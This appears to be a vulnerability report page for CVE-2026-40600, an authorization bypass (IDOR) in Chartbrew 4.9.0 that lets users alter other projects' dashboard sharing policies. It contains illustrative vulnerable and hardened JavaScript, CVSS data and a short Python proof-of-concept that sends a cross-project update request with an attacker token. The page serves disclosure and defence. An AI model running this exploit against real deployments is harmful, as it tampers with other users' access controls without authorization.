Security Vulnerability Report
CVE-2026-40600 (CVSS 8.1, HIGH)

Published: 2026-04-30 19:16:10
Last Modified: 2026-05-01 15:31:02

Description

Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. In version 4.9.0, Chartbrew allows authenticated users with access to one project to update or delete a SharePolicy record that belongs to a different project. The affected routes authorize the caller against the project in the URL path, but they never verify that policy_id belongs to that project. This permits cross-project modification of dashboard sharing rules, including visibility, password requirements, allowed parameters, and expiration settings. This issue has been patched in version 5.0.0.
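The root cause described above is a missing ownership check: membership in the project named in the URL is verified, but the policy id is used as-is. The example below contrasts that shape with a hardened handler that scopes the lookup by both ids. It is added here for illustration and is not Chartbrew's code; the in-memory store, the user/project membership table and the field name project_id are assumptions.

```javascript
// Constructed sample data: two projects, one SharePolicy each (assumed shape).
const sharePolicies = new Map([
  ["pol-A1", { id: "pol-A1", project_id: "proj-A", visibility: "public" }],
  ["pol-B1", { id: "pol-B1", project_id: "proj-B", visibility: "public" }],
]);
// Constructed memberships: user -> set of project ids the user may access.
const memberships = new Map([["alice", new Set(["proj-A"])]]);

// Vulnerable shape the advisory describes: the caller is authorized against
// the project in the path, but the policy is then fetched by id alone, so a
// policy from any project can be modified.
function updateSharePolicyUnchecked(user, projectIdInPath, policyId, patch) {
  const projects = memberships.get(user);
  if (!projects || !projects.has(projectIdInPath)) return { status: 403 };
  const policy = sharePolicies.get(policyId);
  if (!policy) return { status: 404 };
  Object.assign(policy, patch);
  return { status: 200, policy };
}

// Hardened authorization: project access is necessary but not sufficient;
// the policy must also belong to the project named in the path.
function canUpdateSharePolicy(user, projectIdInPath, policyId) {
  const projects = memberships.get(user);
  if (!projects || !projects.has(projectIdInPath)) {
    return { ok: false, status: 403, reason: "no access to project in path" };
  }
  const policy = sharePolicies.get(policyId);
  // Same 404 for "missing" and "belongs to another project", so the status
  // code does not confirm whether a guessed policy id exists elsewhere.
  if (!policy || policy.project_id !== projectIdInPath) {
    return { ok: false, status: 404, reason: "policy not found in this project" };
  }
  return { ok: true, status: 200, policy };
}

// Hardened update: every mutation goes through the scoped check above.
function updateSharePolicy(user, projectIdInPath, policyId, patch) {
  const auth = canUpdateSharePolicy(user, projectIdInPath, policyId);
  if (!auth.ok) return { status: auth.status };
  Object.assign(auth.policy, patch);
  return { status: 200, policy: auth.policy };
}
```

The same scoped lookup applies to the delete route; a query of the form "policy where id = ? and project_id = ?" keeps the two checks from drifting apart.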

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
Weakness
CWE-639 (Authorization Bypass Through User-Controlled Key)

Configurations (Affected Products)

Chartbrew 4.9.0
Chartbrew < 5.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC for CVE-2026-40600: IDOR in Chartbrew
import requests

target_url = "http://target.com/api/share-policies/{policy_id}"

# Attacker has access to Project A, but targets a policy ID from Project B
victim_policy_id = "12345-policy-id-victim"

payload = {
    "visibility": "private",
    "allowedParameters": "malicious_config"
}

# Attacker's valid session token
headers = {
    "Authorization": "Bearer <attacker_token>",
    "Content-Type": "application/json"
}

# Server checks project access (passed) but fails to check policy ownership
response = requests.put(
    target_url.format(policy_id=victim_policy_id),
    json=payload,
    headers=headers,
)

if response.status_code == 200:
    print("[+] Exploit successful: SharePolicy updated across projects.")
else:
    print(f"[-] Exploit failed with status: {response.status_code}")
```

References

https://github.com/chartbrew/chartbrew/releases/tag/v5.0.0
https://github.com/chartbrew/chartbrew/security/advisories/GHSA-pq8h-2h99-39xm

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-40600",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-30T19:16:09.957",
    "lastModified": "2026-05-01T15:31:02.467",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. In version 4.9.0, Chartbrew allows authenticated users with access to one project to update or delete a SharePolicy record that belongs to a different project. The affected routes authorize the caller against the project in the URL path, but they never verify that policy_id belongs to that project. This permits cross-project modification of dashboard sharing rules, including visibility, password requirements, allowed parameters, and expiration settings. This issue has been patched in version 5.0.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{ "lang": "en", "value": "CWE-639" }]
      }
    ],
    "references": [
      { "url": "https://github.com/chartbrew/chartbrew/releases/tag/v5.0.0", "source": "[email protected]" },
      { "url": "https://github.com/chartbrew/chartbrew/security/advisories/GHSA-pq8h-2h99-39xm", "source": "[email protected]" },
      { "url": "https://github.com/chartbrew/chartbrew/security/advisories/GHSA-pq8h-2h99-39xm", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0" }
    ]
  }
}
```